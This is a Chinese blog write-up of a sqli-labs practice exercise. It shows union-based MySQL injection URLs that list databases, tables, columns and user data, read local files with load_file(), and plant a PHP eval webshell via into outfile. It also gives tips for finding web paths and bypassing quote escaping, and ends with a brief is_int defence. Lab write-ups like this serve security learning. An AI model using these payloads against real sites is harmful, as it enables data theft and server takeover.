MySQL注入-sqli-labs-读取其他数据库信息以及文件读写

最新推荐文章于 2022-05-31 14:40:05 发布
最新推荐文章于 2022-05-31 14:40:05 发布
阅读量493 收藏 1
点赞数
分类专栏: 靶场记录 文章标签: 安全漏洞 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43896364/article/details/117855829
版权

 前置知识1

MySQL5.0版本以后出现了information_schema,把 information_schema 看作是一个数据库,确切说是信息数据库。其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权 限等。在INFORMATION_SCHEMA中,有数个只读表。它们实际上是视图,而不是基本表,因此,你将无法看到与之相关的任何文件。information_schema.columns和information_schema.tables类似

前置知识2

获得其他数据库名的前提是user()函数查询出来用户为root且为真实root权限

前置知识3

load_file():读取文件函数,读取文件的前提是知道网站的绝对路径,绝对路径获取常见方法下面有介绍

into outfile或者into dumpfile:导出函数

前置知识4

magic_quotes_gpc:魔术方法,MySQL4.0之后默认开启,开启之后会转义单引号、双引号等,所以在用到引号的地方都需要使用反斜杠防止转义,或者进行十六进制编码、宽字节等绕过

路径获取常见方法:

报错显示:inurl:edu.cn warning

遗留文件:phpinfo.php,漏扫工具一扫就出来了

漏洞报错:根据CMS漏洞搜索爆出路径的方法

平台配置文件:通过读取权限获取配置文件,不实用

爆破:配合工具爆破(没有办法的办法)

案例操作1 读取其它数据库信息

利用information_schema.schemata表爆出其他的数据库名称

http://127.0.0.1/sqli-labs-master/Less-2/?id=-1%20union%20select%201,group_concat(schema_name),3%20from%20information_schema.schemata

 利用information_schema.tables表爆出其中某个数据库的所有表名

http://127.0.0.1/sqli-labs-master/Less-2/?id=-1%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27pikachu%27

 接着爆出列名

http://127.0.0.1/sqli-labs-master/Less-2/?id=-1%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=%27pikachu%27%20and%20table_name=%27member%27

爆某个列的字段

http://127.0.0.1/sqli-labs-master/Less-2/?id=-1%20union%20select%201,group_concat(username),3%20from%20pikachu.member

案例操作2 文件写入与读取操作

文件读取--load_file()

注意:

1.如果页面没有返回值而且确定代码无误,那么在mysql安装目录中的my.ini文件中的[mysqld]项下添加 secure_file_priv = ''即可

2.读取路径要用斜杠,如果是反斜杠需要用两个防止转义

3.引号被过滤时,将路径转换为十六进制数据

http://127.0.0.1/sqli-labs-master/Less-2/?id=-1%20union%20select%201,load_file(%27D:/test.txt%27),3--+

 文件写入(写入木马文件)--into outfile

注意:

1.如果只能写入一些字符串而不能写入php代码,可能是因为魔术引号,需要绕过

http://127.0.0.1/sqli-labs-master/Less-2/?id=-1%20union%20select%201,%27%3C?php%20@eval($_POST[\%27hack\%27])?%3E%27,3%20into%20outfile%20%27d:/1.php%27--+

防御方法

   比较极端,在将参数带入到查询语句中执行之前使用is_int方法判断传递的参数是否为数字,不是数字就报错(十六进制也有字母,也算是字符串),这样MySQL联合查询注入就不会发生了。实战情况下这样的过滤不常见,一般都会写一个全局配置文件,专门用来过滤

刻行
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
使用Spark(jdbc)从MySQL读取和保存数据.
01-19
使用Spark(jdbc)从MySQL读取和保存数据.
mysql注入-sqlilabs靶场注入
10-15
本教程基于SQLiLabs靶场,将深入探讨MySQL注入的各种技术和防御策略。 SQLiLabs是专门为学习和实践SQL注入技能设计的一个在线平台,它包含了多个级别,每个级别代一个特定的注入场景,逐步提高难度。通过完成这些...
Mysql基础知识以及入门sqlilabs靶场 less1
wcl20010的博客
05-10 321
首先讲一下SQL注入产生的原因:前台用户输入的数据传到服务端时,没有严格判断,过滤等,导致传进来的数据被拼接到sql语句中被执行,从而导致数据泄露,可能会服务器瘫痪。 SQL注入的分类: 从反馈的结果来看 有回显型 无回显型/盲注 攻击手法上来看: 联合查询注入:union select 堆叠注入mysql_multi_query()函数支持多条sql语句同时执行,就是多个 ; 分隔,成堆的执行sql语句,如: PHP为了防止sql堆叠注入机制,往往使用调用数据库的函数是mysqli_ que
mysql 字段 i d_sqli-labs(1-10)
weixin_36187176的博客
02-27 158
前言:此文用于记录学习SQL注入过程中的所得所思,因为可以说是菜鸟了,需要参考大佬的解题方法,所以一切慢慢来吧,希望越来越强。做题过程中的各种知识在mysql数据库中,单行注释有#和--,在实际操作中#号一般用%23来示。而--则用--+来示。因为在URL中,如果在最后加上-- ,浏览器在发送请求的时候会把URL末尾的空格舍去,而用--+代替--,原因是+在URL被URL编码后会变成空格。与数...
利用SQL注入进行文件读写(详细步骤的实现+图)【靶场:sqli-labs/Less-7】
weixin_46709219的博客
12-15 3663
原理啊,成因啊就不再啰嗦了,直接上实现过程。 一)环境: 攻击机:192.168.67.140 目标主机:192.168.67.143 二)实际操作: 利用mysql写文件函数进行文件的读取: 在目标主机的(win7-2)E盘下新建一个flag.txt文件,可以通过输入 select load_file("E:\\flag.txt"); 命令读取指定路径下的flag.txt文件的内容: 在实际中通过漏洞利用进行文件读取: 在攻击机(win7-1)中访问存在SQL注入的网站(如目标主机win7-2中的
怎么通过sql语句访问另外一个库的内容
感悟人生
09-12 1218
 select *from opendatasource    (       SQLOLEDB,       Data Source=192.168.1.101;User Id=sa;Password=zhtz    ).sims.dbo.sims_Applywhere 1=1 1.SQLOLEDB:注册为用于访问数据源的 OLE DB 访问接口的
sqli-labs配置数据库sqli-labs的数据库文件
最新发布
03-09
Unable to connect to the database: security sqli-labs通过docker安装时,缺少数据库文件,可以通过这个sql文件直接安装
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
sqli-labs 提供了一个实践 SQL 注入的平台,用户可以在这个平台上进行 SQL 注入的练习和测试。 知识点 2: PHP 和 Apache 环境安装 要部署 sqli-labs,需要先安装 PHP 和 Apache 环境。安装过程中可能会遇到各种...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs Less-7 文件读写注入
m0_63711447的博客
04-05 796
SQL语句可以将指定内容写进文件里 1、into outfile 写文件 select 'xxxxx' into outfile '文件路径'; 单个反斜杠\t 出现了转义使语句无法执行,改为用双反斜杠即可 2、load_file() 读取本地文件 select load_file('要读取的文件路径'); 下面开始第七关的练习: 1、输入id=1,出现提示use outfile 2、分析闭合方式 添加单引号报错,所以闭合方式为单引号 判断括号个数 ,id=1'))--..
mysql读取数据库三种方法
php|nginx|python|vue|redis|linux
11-09 2194
 $dbh = @mysql_connect("localhost:3306","root","000000");/* 定义变量dbh , mysql_connect()函数的意思是连接mysql数据库, "@"的意思是屏蔽报错 */if(!$dbh){die("error");}/* die()函数的意思是将括号里的字串送到浏览器并中断PHP程式 (Script)。括号里的参
(slmap)【sqli-labs7】GET请求、文件读写注入:使用方法
05-31 820
sqlmap注入sqli-labs7
sqli-labs Less-7(SQL注入文件读写
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
02-04 363
在使用sqli-labs Less-7测试的时候一直有问题,无奈改用Less-1 winserver的iis默认路径c:\Inetpub\wwwroot linux的nginx一般是/usr/local/nginx/html,/home/wwwroot/default,/usr/share/nginx,/var/www/htm等 apache 就…/var/www/htm,…/var/www/html/htdocs phpstudy 就是…\PhpStudy20180211\PHPTutorial\WWW
打穿sqli-labs靶场第五天(less-7)文件写入
qq_45741871的博客
04-11 3645
sqli-labs靶场文件写入
sqlilabs靶场学习(part2:mysql数据库与常用函数学习)
AFCC_的博客(Web_Dog)
04-16 2662
# 0x00 基础知识学习 在CTF赛题中最常见的就是```php+mysql```的数据库注入题目,这类题目需要我们掌握基本的sql语言使用和mysql系统基础,便于我们理解每次使用的句子,例如用户基本信息在哪里存放?共有多少个数据库?等一些需要我们知道的信息。 # 0x01 mysql系统库 在命令行下使用 ```bash mysql.exe -u root@127.0.0.1 -p ``` 输入密码后进入mysql命令行界面。
记一次mysqli-lab靶场数据库连接错误解决
qq_42551635的博客
08-27 930
今天打开sqli-lab继续学习sql注入技术,进入环境却发现报了如下错误: Fatal error: Uncaught Error: Call to undefined function mysql_connect() in D:\phpstudy_pro\WWW\sqli- 这是由于sql-lab链接数据库的方式为sql_connect()函数,而这个函数在较高版本的php里被停用了,所以解决方案就是使用php的较低版本,这里附上sql_connect.php的源码,发现使用了sql_connect()
sql注入中的跨库操作
lemeifei的博客
11-16 3315
MYSQL注入中首先要明确当前注入点权限,高权限注入时有更多的攻击手法,有的能直接进行getshell操作。其中也会遇到很多阻碍,相关防御方案也要明确,所谓知己知彼,百战不殆。不论作为攻击还是防御都需要了解其中的手法和原理,这样才是一个合格的安全工作者。 下面来介绍下sql注入的跨库操作,以sql-labs靶场为例 http://192.168.200.134:86/Less-2/ 下来直接操作information_schema.schemata http://192.168.200.134:86/Les
mysql,一个实例多个数据库之间的相互访问
cool_sjq163com的博客
05-30 1778
mysql,一个实例多个数据库之间的相互访问 背景: 同一个实例下,有A,B,2个库名,A库下有a1,a2,B库下有b1,b2 java项目,当前连的数据库A,在xml中如果需要访问B库下的b1,该怎么处理? 通过项目,我了解的2种方式: 1,在A库下,新建一个视图V1,该视图访问B库下的(B.b1),然后在mybatis的xml中就可以直接访问该视图V1了, select * from `B`.`b1` select * from 另外一个数据库名称.该数据库下的某一个名 2,不

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值